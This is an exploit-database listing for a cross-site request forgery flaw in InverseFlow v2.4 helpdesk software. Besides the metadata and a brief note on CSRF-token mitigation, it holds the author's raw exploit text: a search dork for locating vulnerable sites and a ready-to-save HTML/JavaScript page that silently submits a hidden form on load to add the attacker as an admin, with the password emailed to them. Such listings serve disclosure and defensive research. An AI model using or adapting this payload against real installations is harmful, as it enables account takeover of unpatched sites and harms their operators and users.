header-logo
Suggest Exploit
vendor:
inverseflow
by:
EjRaM HaCkEr
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: inverseflow
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: NO
Related CWE: N/A
CPE: inverseflow:inverseflow:2.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User)

InverseFlow v2.4 is vulnerable to CSRF attacks. An attacker can craft a malicious HTML page and send it to the victim. When the victim visits the malicious page, the attacker can add themselves as an admin user without any warning. The password will be sent to the attacker's email address.

Mitigation:

Implementing a CSRF token in the application can help prevent CSRF attacks.
Source

Exploit-DB raw data:

#(+) Exploit Title: InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User) 

#(+) Version   : 2.4

#(+) Author    : EjRaM HaCkEr  

#(+) Contact   : m2z()9.cn

#(+) Dork      : inurl:"ticket.php?cmd=lost"
#(+) Software Link : http://asria.info/download/script/inverseflow.zip 


0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  


# All you have to do is save the below code as exploit.html  

# will automatically add the attacker as Admin without warning ;)

# The password will be sent automatically to email ;)



Code:  



<html>
<head>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "2360" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form0" action="http://localhost/support/user.php">
<input type="hidden" name="cmd" value="add"/>
<input type="hidden" name="name" value="ejram hacker"/>
<input type="hidden" name="email" value="ejram@gmail.com"/>
</form>

</body>
</html>

########################################################################  

(+)Exploit Coded by: EjRaM HaCkEr   

(+)Gr33ts to : tryag.cc + r00t-s3c.com + v99x.com :)  

########################################################################

Navigation

Suggest Exploit

Services By CQR